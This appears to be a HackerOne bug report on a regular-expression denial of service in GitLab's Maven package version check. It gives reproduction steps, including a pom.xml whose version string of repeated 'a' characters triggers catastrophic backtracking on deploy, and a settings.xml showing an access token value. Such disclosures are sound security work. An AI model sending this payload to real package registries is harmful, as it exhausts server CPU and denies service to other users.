Maven package version ReDoS

HackerOne report #997961 by anyday on 2020-10-05, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

Report

Hello,

Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking : aaaa....! (!32925 (merged))

Steps to reproduce:

Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/

• generate project
  mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

• create settings.xml with your access token (eg at /root/.m2/settings.xml)

<settings>  
  <servers>  
    <server>  
      <id>gitlab-maven</id>  
      <configuration>  
        <httpHeaders>  
          <property>  
            <name>Private-Token</name>  
            <value>srzc2-M3ysZx-ZEKQRki</value>  
          </property>  
        </httpHeaders>  
      </configuration>  
    </server>  
  </servers>  
</settings>  

Edit pom.xml with

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">  
  <modelVersion>4.0.0</modelVersion>  
  <groupId>com.mycompany.mydepartment</groupId>  
  <artifactId>my-project</artifactId>  
  <packaging>jar</packaging>

  <version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->

  <name>my-project</name>  
  <url>http://maven.apache.org</url>  
  <dependencies>  
    <dependency>  
      <groupId>junit</groupId>  
      <artifactId>junit</artifactId>  
      <version>3.8.1</version>  
      <scope>test</scope>  
    </dependency>  
  </dependencies>

  <properties><!-- Maven was complaining about something -->  
    <maven.compiler.source>6</maven.compiler.source>  
    <maven.compiler.target>6</maven.compiler.target>  
  </properties>

  <repositories><!------------------------------------------------------------ replace(3) 'gitlab.com' and 'PROJECT_ID' -->  
    <repository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/packages/maven</url>  
    </repository>  
  </repositories>

  <distributionManagement>  
    <repository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>  
    </repository>  
    <snapshotRepository>  
      <id>gitlab-maven</id>  
      <url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>  
    </snapshotRepository>  
  </distributionManagement>  
</project>

• mvn deploy

Video:
mvn_redos.mp4

Impact

Denial of service, CPU exhaustion

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• mvn_redos.mp4

How To Reproduce

Please add reproducibility information to this section: